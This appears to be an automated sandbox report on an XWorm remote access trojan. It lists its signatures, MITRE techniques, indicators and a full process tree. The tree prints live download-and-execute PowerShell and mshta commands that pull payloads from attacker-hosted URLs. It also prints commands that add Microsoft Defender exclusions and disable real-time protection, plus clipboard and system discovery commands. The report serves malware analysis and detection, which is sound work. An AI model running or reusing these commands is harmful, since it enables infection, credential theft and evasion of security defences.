xworm | 280dcd871598f7ac18dba9d481761b75a46ea1603ffcc221382a512399daa416

Resubmissions

22-01-2025 06:18

250122-g2qjxasqep 10

22-01-2025 06:09

250122-gwm7laskav 10

Analysis

max time kernel
37s
max time network
46s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-01-2025 06:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.cmd
Size

140B
MD5

6048bdda1dfd48e6a362ab0215f5e568
SHA1

e49d8e37a5eff5fd81584bca4d2184a2a9716b67
SHA256

280dcd871598f7ac18dba9d481761b75a46ea1603ffcc221382a512399daa416
SHA512

d56ea7dc7c6b1931cd15248e034906b4187c07ea5114699b0be98e85c7f008a40a1754aa17fb0cfd1e939c04357ee37ea8d6f8f4ecd6d2b3996ef7fb3a93bcff

Score

10^/10

xworm collection credential_access defense_evasion discovery execution persistence privilege_escalation pyinstaller rat spyware stealer trojan upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1

Extracted

Family

xworm

Attributes

install_file
client.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4844-81-0x0000000000400000-0x0000000000418000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 10 IoCs

flow	pid	Process
7	4088	powershell.exe
16	4088	powershell.exe
19	4088	powershell.exe
26	968	powershell.exe
28	3436	powershell.exe
29	1332	powershell.exe
31	968	powershell.exe
32	1332	powershell.exe
35	968	powershell.exe
38	1332	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3436	powershell.exe
1332	powershell.exe
4896	powershell.exe
4952	powershell.exe
3968	powershell.exe
3328	powershell.exe
3960	powershell.exe
4088	powershell.exe
968	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5072	powershell.exe
4804	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
3496	loader.exe
1364	Updateclient.scr
2672	Updateclient.scr

Loads dropped DLL 17 IoCs

pid	Process
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr
2672	Updateclient.scr

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0007000000023cb0-18.dat	vmprotect
behavioral1/memory/3496-27-0x0000000000C90000-0x0000000000D04000-memory.dmp	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
25	raw.githubusercontent.com
26	raw.githubusercontent.com
28	raw.githubusercontent.com
29	raw.githubusercontent.com
47	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1240	tasklist.exe
1996	tasklist.exe
320	tasklist.exe
760	tasklist.exe
3048	tasklist.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1332 set thread context of 4844	1332	powershell.exe	113

UPX packed file 42 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023cdd-178.dat	upx
behavioral1/memory/2672-184-0x00007FF85CF40000-0x00007FF85D5A3000-memory.dmp	upx
behavioral1/files/0x0007000000023ccf-186.dat	upx
behavioral1/files/0x0007000000023cd8-204.dat	upx
behavioral1/memory/2672-205-0x00007FF876410000-0x00007FF87641F000-memory.dmp	upx
behavioral1/files/0x0007000000023cd7-203.dat	upx
behavioral1/files/0x0007000000023cd6-202.dat	upx
behavioral1/files/0x0007000000023cd5-201.dat	upx
behavioral1/files/0x0008000000023ccd-200.dat	upx
behavioral1/files/0x0007000000023cd1-199.dat	upx
behavioral1/files/0x0007000000023cd0-198.dat	upx
behavioral1/files/0x0007000000023cce-197.dat	upx
behavioral1/files/0x0007000000023ce1-196.dat	upx
behavioral1/files/0x0007000000023ce0-195.dat	upx
behavioral1/files/0x0007000000023cdf-194.dat	upx
behavioral1/files/0x0007000000023cdc-192.dat	upx
behavioral1/files/0x0007000000023cda-191.dat	upx
behavioral1/files/0x0007000000023cdb-190.dat	upx
behavioral1/memory/2672-189-0x00007FF8734E0000-0x00007FF873507000-memory.dmp	upx
behavioral1/memory/2672-209-0x00007FF85FA90000-0x00007FF85FABB000-memory.dmp	upx
behavioral1/memory/2672-213-0x00007FF85EC70000-0x00007FF85EDEF000-memory.dmp	upx
behavioral1/memory/2672-211-0x00007FF85FA60000-0x00007FF85FA85000-memory.dmp	upx
behavioral1/memory/2672-207-0x00007FF8607F0000-0x00007FF860809000-memory.dmp	upx
behavioral1/memory/2672-215-0x00007FF8607D0000-0x00007FF8607E9000-memory.dmp	upx
behavioral1/memory/2672-217-0x00007FF874AF0000-0x00007FF874AFD000-memory.dmp	upx
behavioral1/memory/2672-224-0x00007FF85F1F0000-0x00007FF85F2BE000-memory.dmp	upx
behavioral1/memory/2672-223-0x00007FF85CF40000-0x00007FF85D5A3000-memory.dmp	upx
behavioral1/memory/2672-227-0x00007FF8734E0000-0x00007FF873507000-memory.dmp	upx
behavioral1/memory/2672-226-0x00007FF85C300000-0x00007FF85C833000-memory.dmp	upx
behavioral1/memory/2672-219-0x00007FF85F2C0000-0x00007FF85F2F4000-memory.dmp	upx
behavioral1/memory/2672-229-0x00007FF85EC50000-0x00007FF85EC64000-memory.dmp	upx
behavioral1/memory/2672-231-0x00007FF86DEF0000-0x00007FF86DEFD000-memory.dmp	upx
behavioral1/memory/2672-234-0x00007FF85D870000-0x00007FF85D923000-memory.dmp	upx
behavioral1/memory/2672-233-0x00007FF85FA90000-0x00007FF85FABB000-memory.dmp	upx
behavioral1/memory/2672-257-0x00007FF85FA60000-0x00007FF85FA85000-memory.dmp	upx
behavioral1/memory/2672-258-0x00007FF85EC70000-0x00007FF85EDEF000-memory.dmp	upx
behavioral1/memory/2672-420-0x00007FF874AF0000-0x00007FF874AFD000-memory.dmp	upx
behavioral1/memory/2672-422-0x00007FF85F2C0000-0x00007FF85F2F4000-memory.dmp	upx
behavioral1/memory/2672-619-0x00007FF85F1F0000-0x00007FF85F2BE000-memory.dmp	upx
behavioral1/memory/2672-622-0x00007FF85C300000-0x00007FF85C833000-memory.dmp	upx
behavioral1/memory/2672-629-0x00007FF85EC70000-0x00007FF85EDEF000-memory.dmp	upx
behavioral1/memory/2672-623-0x00007FF85CF40000-0x00007FF85D5A3000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000a000000023cb6-156.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3008	cmd.exe
4548	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5008	WMIC.exe
3760	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2416	systeminfo.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3076	reg.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4088	powershell.exe
4088	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
3436	powershell.exe
1332	powershell.exe
1332	powershell.exe
3436	powershell.exe
3960	powershell.exe
3960	powershell.exe
3968	powershell.exe
3968	powershell.exe
4844	RegAsm.exe
4896	powershell.exe
4896	powershell.exe
3328	powershell.exe
3328	powershell.exe
4896	powershell.exe
3328	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeIncreaseQuotaPrivilege	968	powershell.exe
Token: SeSecurityPrivilege	968	powershell.exe
Token: SeTakeOwnershipPrivilege	968	powershell.exe
Token: SeLoadDriverPrivilege	968	powershell.exe
Token: SeSystemProfilePrivilege	968	powershell.exe
Token: SeSystemtimePrivilege	968	powershell.exe
Token: SeProfSingleProcessPrivilege	968	powershell.exe
Token: SeIncBasePriorityPrivilege	968	powershell.exe
Token: SeCreatePagefilePrivilege	968	powershell.exe
Token: SeBackupPrivilege	968	powershell.exe
Token: SeRestorePrivilege	968	powershell.exe
Token: SeShutdownPrivilege	968	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeSystemEnvironmentPrivilege	968	powershell.exe
Token: SeRemoteShutdownPrivilege	968	powershell.exe
Token: SeUndockPrivilege	968	powershell.exe
Token: SeManageVolumePrivilege	968	powershell.exe
Token: 33	968	powershell.exe
Token: 34	968	powershell.exe
Token: 35	968	powershell.exe
Token: 36	968	powershell.exe
Token: SeIncreaseQuotaPrivilege	968	powershell.exe
Token: SeSecurityPrivilege	968	powershell.exe
Token: SeTakeOwnershipPrivilege	968	powershell.exe
Token: SeLoadDriverPrivilege	968	powershell.exe
Token: SeSystemProfilePrivilege	968	powershell.exe
Token: SeSystemtimePrivilege	968	powershell.exe
Token: SeProfSingleProcessPrivilege	968	powershell.exe
Token: SeIncBasePriorityPrivilege	968	powershell.exe
Token: SeCreatePagefilePrivilege	968	powershell.exe
Token: SeBackupPrivilege	968	powershell.exe
Token: SeRestorePrivilege	968	powershell.exe
Token: SeShutdownPrivilege	968	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeSystemEnvironmentPrivilege	968	powershell.exe
Token: SeRemoteShutdownPrivilege	968	powershell.exe
Token: SeUndockPrivilege	968	powershell.exe
Token: SeManageVolumePrivilege	968	powershell.exe
Token: 33	968	powershell.exe
Token: 34	968	powershell.exe
Token: 35	968	powershell.exe
Token: 36	968	powershell.exe
Token: SeIncreaseQuotaPrivilege	968	powershell.exe
Token: SeSecurityPrivilege	968	powershell.exe
Token: SeTakeOwnershipPrivilege	968	powershell.exe
Token: SeLoadDriverPrivilege	968	powershell.exe
Token: SeSystemProfilePrivilege	968	powershell.exe
Token: SeSystemtimePrivilege	968	powershell.exe
Token: SeProfSingleProcessPrivilege	968	powershell.exe
Token: SeIncBasePriorityPrivilege	968	powershell.exe
Token: SeCreatePagefilePrivilege	968	powershell.exe
Token: SeBackupPrivilege	968	powershell.exe
Token: SeRestorePrivilege	968	powershell.exe
Token: SeShutdownPrivilege	968	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeSystemEnvironmentPrivilege	968	powershell.exe
Token: SeRemoteShutdownPrivilege	968	powershell.exe
Token: SeUndockPrivilege	968	powershell.exe
Token: SeManageVolumePrivilege	968	powershell.exe
Token: 33	968	powershell.exe
Token: 34	968	powershell.exe
Token: 35	968	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4844	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4240 wrote to memory of 3932	4240	cmd.exe	84
PID 4240 wrote to memory of 3932	4240	cmd.exe	84
PID 3932 wrote to memory of 4088	3932	mshta.exe	85
PID 3932 wrote to memory of 4088	3932	mshta.exe	85
PID 4088 wrote to memory of 5080	4088	powershell.exe	87
PID 4088 wrote to memory of 5080	4088	powershell.exe	87
PID 4088 wrote to memory of 3496	4088	powershell.exe	89
PID 4088 wrote to memory of 3496	4088	powershell.exe	89
PID 3496 wrote to memory of 3052	3496	loader.exe	91
PID 3496 wrote to memory of 3052	3496	loader.exe	91
PID 3052 wrote to memory of 852	3052	cmd.exe	93
PID 3052 wrote to memory of 852	3052	cmd.exe	93
PID 852 wrote to memory of 968	852	mshta.exe	94
PID 852 wrote to memory of 968	852	mshta.exe	94
PID 968 wrote to memory of 2596	968	powershell.exe	99
PID 968 wrote to memory of 2596	968	powershell.exe	99
PID 2596 wrote to memory of 1272	2596	csc.exe	102
PID 2596 wrote to memory of 1272	2596	csc.exe	102
PID 968 wrote to memory of 2468	968	powershell.exe	105
PID 968 wrote to memory of 2468	968	powershell.exe	105
PID 968 wrote to memory of 3436	968	powershell.exe	106
PID 968 wrote to memory of 3436	968	powershell.exe	106
PID 968 wrote to memory of 1332	968	powershell.exe	108
PID 968 wrote to memory of 1332	968	powershell.exe	108
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 1332 wrote to memory of 4844	1332	powershell.exe	113
PID 4844 wrote to memory of 3960	4844	RegAsm.exe	117
PID 4844 wrote to memory of 3960	4844	RegAsm.exe	117
PID 4844 wrote to memory of 3960	4844	RegAsm.exe	117
PID 4844 wrote to memory of 3968	4844	RegAsm.exe	119
PID 4844 wrote to memory of 3968	4844	RegAsm.exe	119
PID 4844 wrote to memory of 3968	4844	RegAsm.exe	119
PID 968 wrote to memory of 1364	968	powershell.exe	124
PID 968 wrote to memory of 1364	968	powershell.exe	124
PID 1364 wrote to memory of 2672	1364	Updateclient.scr	125
PID 1364 wrote to memory of 2672	1364	Updateclient.scr	125
PID 2672 wrote to memory of 4088	2672	Updateclient.scr	205
PID 2672 wrote to memory of 4088	2672	Updateclient.scr	205
PID 2672 wrote to memory of 3512	2672	Updateclient.scr	202
PID 2672 wrote to memory of 3512	2672	Updateclient.scr	202
PID 2672 wrote to memory of 4952	2672	Updateclient.scr	130
PID 2672 wrote to memory of 4952	2672	Updateclient.scr	130
PID 2672 wrote to memory of 2404	2672	Updateclient.scr	199
PID 2672 wrote to memory of 2404	2672	Updateclient.scr	199
PID 4952 wrote to memory of 1240	4952	cmd.exe	136
PID 4952 wrote to memory of 1240	4952	cmd.exe	136
PID 3512 wrote to memory of 4896	3512	cmd.exe	197
PID 3512 wrote to memory of 4896	3512	cmd.exe	197
PID 4088 wrote to memory of 3328	4088	cmd.exe	177
PID 4088 wrote to memory of 3328	4088	cmd.exe	177
PID 2404 wrote to memory of 788	2404	cmd.exe	139
PID 2404 wrote to memory of 788	2404	cmd.exe	139
PID 2672 wrote to memory of 4920	2672	Updateclient.scr	209
PID 2672 wrote to memory of 4920	2672	Updateclient.scr	209
PID 4920 wrote to memory of 1092	4920	cmd.exe	195
PID 4920 wrote to memory of 1092	4920	cmd.exe	195
PID 2672 wrote to memory of 4352	2672	Updateclient.scr	143
PID 2672 wrote to memory of 4352	2672	Updateclient.scr	143

Views/modifies file attributes 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5080	attrib.exe
2468	attrib.exe
1092	attrib.exe
1520	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4240
- C:\Windows\system32\mshta.exe
  mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://codeforfun.vercel.app/sigma') | iex""",0)(window.close)
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://codeforfun.vercel.app/sigma') | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
      4⤵
      Views/modifies file attributes
      PID:5080
  - - C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\loader.exe
      "C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\loader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\loader.cmd" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3052
      - C:\Windows\system32\mshta.exe
        
        mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:968
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\au4skd3c\au4skd3c.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2596
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3EA.tmp" "c:\Users\Admin\AppData\Local\Temp\au4skd3c\CSC824106F766D44CC8AB17565D1E7F8C3D.TMP"
        9⤵
        
        PID:1272
        
        C:\Windows\system32\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
        8⤵
        Views/modifies file attributes
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        9⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RegAsm.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3968
        
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr
        
        "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr" /S
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1364
        
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr
        
        "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr" /S
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr'"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:3512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:4952
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:1240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2404
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        
        PID:788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:4920
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        11⤵
        
        PID:1092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        10⤵
        
        PID:4352
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        11⤵
        
        PID:1040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        10⤵
        
        PID:456
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:5008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        10⤵
        
        PID:3236
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:3760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:4196
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        10⤵
        
        PID:1680
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        11⤵
        Modifies registry key
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:2964
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        10⤵
        
        PID:1460
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        11⤵
        
        PID:4928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        10⤵
        Clipboard Data
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        11⤵
        Clipboard Data
        
        PID:5072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:1068
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:4556
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:1872
        
